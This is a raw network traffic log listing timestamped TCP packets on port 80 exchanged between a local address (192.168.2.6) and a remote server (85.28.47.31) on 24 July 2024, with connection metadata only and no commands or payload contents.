                                                                                        Jul 24, 2024 07:14:12.943368912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.943950891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.943963051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.943995953 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.944029093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.944613934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.944626093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.944638014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.944660902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.944695950 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.945307970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.945321083 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.945362091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.946005106 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.946017981 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.946052074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.946086884 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.946662903 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.946676016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.946707964 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.946739912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.947377920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.947390079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.947421074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.947454929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.948043108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.948055983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.948070049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.948102951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.948102951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.948712111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.948724985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.948734999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.948765039 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.948796034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.949691057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.949703932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.949712992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.949723959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.949733973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.949734926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.949768066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.949790955 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.950774908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.950788021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.950798988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.950819969 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.950859070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.951610088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.951622963 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.951632023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.951642036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.951657057 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.951695919 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.952447891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.952459097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.952465057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.952620983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.953241110 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.953253984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.953262091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.953273058 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.953284025 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.953324080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.953324080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.954076052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.954088926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.954099894 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.954123020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.954138041 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.954916000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.954929113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.954940081 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.954951048 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.954962969 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.954979897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.955014944 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.955705881 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.955718994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.955729961 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.955751896 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.955774069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.956537008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.956549883 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.956559896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.956623077 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.956623077 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.957303047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.957314968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.957324982 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.957335949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.957350016 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.957364082 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.957387924 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.958095074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.958106041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.958117962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.958133936 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.958158016 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.958842039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.958853960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.958865881 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.958884001 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.958905935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.959551096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.959563017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.959572077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.959590912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.959616899 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.013320923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.013360023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.013462067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.013509035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.013509035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.013509035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.013741970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.013753891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.013765097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.013787031 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.013799906 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.014513016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.014525890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.014570951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.020670891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.020749092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.020802021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.020813942 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.020849943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.020875931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.021312952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.021325111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.021333933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.021372080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.021394968 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.022355080 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.022396088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.022407055 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.022412062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.022417068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.022433996 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.022455931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.022978067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.022990942 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.023000956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.023042917 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.023042917 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.023721933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.023780107 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.028704882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.028764963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.028810024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.029021978 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.029072046 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.029128075 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.029179096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.029238939 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.029414892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.029427052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.029437065 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.029469967 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.029491901 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.030199051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.030211926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.030221939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.030260086 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.030288935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.030980110 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.030992031 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.031002045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.031034946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.031063080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.031836987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.031850100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.031858921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.031868935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.031897068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.031897068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.031930923 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.032732964 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.032744884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.032753944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.032788992 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.032818079 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.033468008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.033479929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.033488989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.033518076 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.033549070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.034286976 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.034300089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.034310102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.034322023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.034352064 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.034352064 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.035053015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.035094023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.035104990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.035118103 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.035151958 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.035795927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.035809994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.035819054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.035830021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.035861969 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.035890102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.036684990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.036696911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.036706924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.036717892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.036730051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.036741972 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.036776066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.036777020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.037545919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.037558079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.037569046 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.037579060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.037604094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.037632942 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.038429976 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.038441896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.038453102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.038464069 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.038474083 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.038480997 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.038486004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.038497925 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.038531065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.039335966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.039347887 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.039356947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.039367914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.039377928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.039401054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.039401054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.039432049 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.040185928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.040216923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.040225983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.040236950 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.040261030 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.040296078 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.041055918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041068077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041079044 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041090012 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041100979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041105986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.041132927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.041161060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.041937113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041948080 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041961908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041974068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041985989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.041997910 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.041997910 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.042027950 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.042743921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.042756081 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.042768002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.042779922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.042792082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.042795897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.042803049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.042821884 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.042850018 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.043692112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.043706894 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.043718100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.043729067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.043740034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.043750048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.043773890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.043792963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.044610023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.044621944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.044631958 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.044642925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.044656038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.044667006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.044673920 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.044673920 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.044713020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.044713020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.045536995 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.045548916 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.045558929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.045568943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.045578957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.045593977 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.045625925 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.045625925 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.104228020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.104366064 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.104417086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.104430914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.104464054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.104492903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.104829073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.104840994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.104852915 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.104866028 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.104876995 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.104912043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.112718105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.112771034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.112782001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.112787008 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.112823963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.112823963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.113465071 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.113480091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.113492012 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.113534927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.113560915 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.113940001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.113951921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.113961935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.113971949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.114000082 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.114022970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.114871025 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.114882946 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.114893913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.114906073 CEST804971185.28.47.31192.168.2.6
